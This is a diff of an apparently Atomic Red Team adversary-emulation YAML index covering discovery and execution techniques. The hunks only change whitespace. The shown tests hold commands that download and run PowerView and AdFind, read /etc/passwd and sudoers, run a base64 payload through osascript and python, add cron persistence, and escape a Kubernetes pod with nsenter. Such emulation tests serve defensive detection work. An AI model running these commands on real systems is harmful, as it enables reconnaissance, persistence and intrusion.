@@ -51208,10 +51208,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -51301,7 +51301,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * - ' +' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -51314,17 +51314,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk - ' +' prereq_command: 'WHERE nltest.exe >NUL 2>&1 - ' +' get_prereq_command: 'echo Sorry RSAT must be installed manually - ' +' executor: command: 'nltest /domain_trusts - ' +' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -51337,26 +51337,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk - ' +' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" - ' +' - description: 'RSAT PowerShell AD admin cmdlets must be installed - ' +' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" - ' +' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" 
@@ -51381,14 +51381,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -51408,14 +51408,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -51549,7 +51549,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. - ' +' supported_platforms: - windows executor: @@ -51588,13 +51588,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system - ' +' supported_platforms: - macos - linux @@ -51700,7 +51700,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file - ' +' supported_platforms: - linux input_arguments: @@ -51714,7 +51714,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 
@@ -51733,14 +51733,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 - ' +' supported_platforms: - linux - macos @@ -51755,26 +51755,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user - ' +' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username - ' +' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely - ' +' supported_platforms: - linux input_arguments: @@ -51786,28 +51786,28 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; - ' +' get_prereq_command: 'echo "Install lastlog on the machine to run the test."; exit 1; - ' +' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups - ' +' supported_platforms: - linux - macos @@ -51820,7 +51820,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups - ' +' supported_platforms: - macos executor: @@ -51851,7 +51851,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: 
@@ -51871,26 +51871,26 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. - ' +' supported_platforms: - windows executor: command: 'query user - ' +' name: command_prompt - name: Enumerate logged on users via PowerShell auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03 description: 'Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed. - ' +' supported_platforms: - windows executor: command: 'query user - ' +' name: powershell T1069.001: technique: @@ -51934,7 +51934,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery - ' +' supported_platforms: - macos - linux @@ -52062,15 +52062,15 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install nmap on the machine to run the test."; exit 1; - ' +' executor: command: | nmap -sS #{network_range} -p #{port} @@ -52095,7 +52095,7 @@ discovery: dependencies: - description: 'NMap must be installed - ' +' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -52108,7 +52108,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python - ' +' supported_platforms: - windows input_arguments: @@ -52124,17 +52124,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' executor: command: 'python #(unknown) -i #{host_ip} - ' +' name: powershell T1135: technique: 
@@ -52198,7 +52198,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery - ' +' supported_platforms: - macos input_arguments: @@ -52216,7 +52216,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus - ' +' supported_platforms: - linux input_arguments: @@ -52232,16 +52232,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares - ' +' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -52259,7 +52259,7 @@ discovery: executor: command: 'net view \\#{computer_name} - ' +' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -52271,7 +52271,7 @@ discovery: executor: command: 'get-smbshare - ' +' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae @@ -52283,28 +52283,28 @@ discovery: executor: command: 'net share - ' +' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain - ' +' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: '"Join system to domain" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -52381,15 +52381,15 @@ discovery: dependencies: - description: 'Check if at least one of the tools are installed on the machine. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; - ' +' executor: command: | tcpdump -c 5 -nnni #{interface} @@ -52413,15 +52413,15 @@ discovery: dependencies: - description: 'Check if at least one of the tools are installed on the machine. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; - ' +' executor: command: "sudo tcpdump -c 5 -nnni #{interface} \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n" @@ -52462,14 +52462,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -52477,7 +52477,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -52550,57 +52550,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. - ' +' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v7 - ' +' executor: command: 'cat /etc/security/pwquality.conf - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v6 - ' +' executor: command: | cat /etc/pam.d/system-auth 
@@ -52610,43 +52610,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. - ' +' supported_platforms: - linux executor: command: 'cat /etc/login.defs - ' +' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts - ' +' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts /domain - ' +' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. - ' +' supported_platforms: - macos executor: @@ -52825,7 +52825,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -52837,7 +52837,7 @@ discovery: executor: command: 'tasklist - ' +' name: command_prompt T1012: technique: @@ -53005,7 +53005,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain - ' +' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -53023,7 +53023,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} - ' +' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 
@@ -53036,7 +53036,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i - ' +' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 @@ -53047,7 +53047,7 @@ discovery: executor: command: 'arp -a - ' +' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -53062,18 +53062,18 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install arp on the machine."; exit 1; - ' +' executor: command: 'arp -a | grep -v ''^?'' - ' +' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -53101,7 +53101,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done - ' +' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f @@ -53146,35 +53146,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'adidnsdump must be installed and part of PATH - ' +' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} - ' +' get_prereq_command: 'pip3 install adidnsdump - ' +' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} - ' +' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects 
@@ -53193,14 +53193,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -53220,14 +53220,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt @@ -53331,7 +53331,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' - ' +' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 @@ -53343,7 +53343,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' - ' +' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 @@ -53356,7 +53356,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 - ' +' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI @@ -53433,7 +53433,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion - ' +' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b 
@@ -53453,7 +53453,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors - ' +' supported_platforms: - macos executor: @@ -53562,7 +53562,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -53572,7 +53572,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor: @@ -53589,7 +53589,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor: @@ -53599,7 +53599,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' T1082: technique: object_marking_refs: @@ -53667,7 +53667,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. - ' +' supported_platforms: - windows executor: @@ -53679,7 +53679,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info - ' +' supported_platforms: - macos executor: @@ -53691,7 +53691,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info - ' +' supported_platforms: - linux - macos 
@@ -53708,14 +53708,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null - ' +' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor: @@ -53734,7 +53734,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor: @@ -53750,40 +53750,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. - ' +' supported_platforms: - windows executor: command: 'hostname - ' +' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. - ' +' supported_platforms: - linux - macos executor: command: 'hostname - ' +' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. - ' +' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid - ' +' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 
@@ -53810,27 +53810,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - windows executor: command: 'set - ' +' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - macos - linux executor: command: 'env - ' +' name: sh T1614: technique: @@ -53977,7 +53977,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all - ' +' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 @@ -54037,10 +54037,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist - ' +' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" @@ -54059,7 +54059,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" - ' +' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee @@ -54077,14 +54077,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt 
@@ -54213,7 +54213,7 @@ discovery: executor: command: 'Get-NetTCPConnection - ' +' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 @@ -54228,14 +54228,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; - ' +' executor: command: | netstat @@ -54269,10 +54269,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) - ' +' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" @@ -54451,10 +54451,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' name: command_prompt T1124: technique: @@ -54521,7 +54521,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -54539,13 +54539,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. - ' +' supported_platforms: - windows executor: command: 'Get-Date - ' +' name: powershell T1497.003: technique: @@ -58138,7 +58138,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\\\" | python &\"" - ' +' name: sh T1053.001: technique: 
@@ -58195,7 +58195,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: @@ -58211,30 +58211,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -58331,7 +58331,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1059: technique: created: '2017-05-31T21:30:49.546Z' @@ -58628,7 +58628,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. - ' +' supported_platforms: - containers input_arguments: @@ -58643,20 +58643,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} - ' +' name: bash elevation_required: false T1053.007: @@ -58725,7 +58725,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: 
@@ -58736,17 +58736,17 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -58758,7 +58758,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -58769,20 +58769,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1053.003: @@ -58841,7 +58841,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -58861,7 +58861,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -58869,7 +58869,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -58901,7 +58901,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: 
@@ -58918,10 +58918,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1610: technique: external_references: @@ -59008,24 +59008,24 @@ execution: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -59033,14 +59033,14 @@ execution: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -59050,11 +59050,11 @@ execution: -ti --rm --image alpine --overrides ''{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod - ' +' T1559.002: technique: created: '2020-02-12T14:10:50.699Z' 
@@ -59131,7 +59131,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word - ' +' supported_platforms: - windows executor: @@ -59154,13 +59154,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script - ' +' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx - ' +' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 @@ -59474,7 +59474,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl - ' +' supported_platforms: - macos input_arguments: @@ -59489,10 +59489,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} - ' +' cleanup_command: 'launchctl remove #{label_name} - ' +' name: bash T1053.004: technique: @@ -59633,7 +59633,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product: @@ -59644,7 +59644,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -59655,7 +59655,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -59664,13 +59664,13 @@ execution: 